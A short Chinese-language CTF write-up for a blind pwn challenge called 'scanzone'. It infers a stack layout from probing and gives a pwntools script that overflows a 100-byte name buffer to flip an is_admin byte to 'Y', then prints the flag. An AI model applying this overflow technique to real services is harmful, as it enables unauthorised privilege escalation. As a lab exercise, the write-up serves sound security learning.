目录
scanzone
Description:
host: ctf.airgapp.in port: 3456
Solution:
一道盲 pwn,赛后看了别的老哥的题解,总结一下思路
首先看程序的执行流程,就只有输入两次的机会,而且没有格式化字符串漏洞
enter your name: admin enter your age: 23 hello user admin, you are 23 years old You are not an admin
经测试如果发送的字符串构造为
#!/usr/bin/env python # -*- coding: utf-8 -*- from pwn import * context.log_level = 'debug' p = remote('ctf.airgapp.in', 3456) pd = 'a' * 0x64 pd += p32(0xffffffff) p.sendlineafter('name:\n', pd) p.sendlineafter(' age:\n', '23') p.interactive()
那么返回的字符串就变成了如下的样子
hello user aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xff\xff\xff\xff, you are -1 years old You are not an admin
那也就可以说,程序的变量大致如下:
char name[100]; int age; // .. other variables ..
下面的话可以猜测是 bool is_admin 或者是 char is_admin
经测试接下来的变量为 char is_admin,程序大致如下:
char name[100] int age; char is_admin = 'N'; // ... if (is_admin == 'Y') // ...
exp 如下:
#!/usr/bin/env python # -*- coding: utf-8 -*- from pwn import * context.log_level = 'debug' p = remote('ctf.airgapp.in', 3456) pd = 'a' * 0x64 pd += p32(0xffffffff) pd += 'Y' p.sendlineafter('name:\n', pd) p.sendlineafter(' age:\n', '23') p.interactive()
Flag:
thug{w3lcome_2_the_sc4n_z0ne}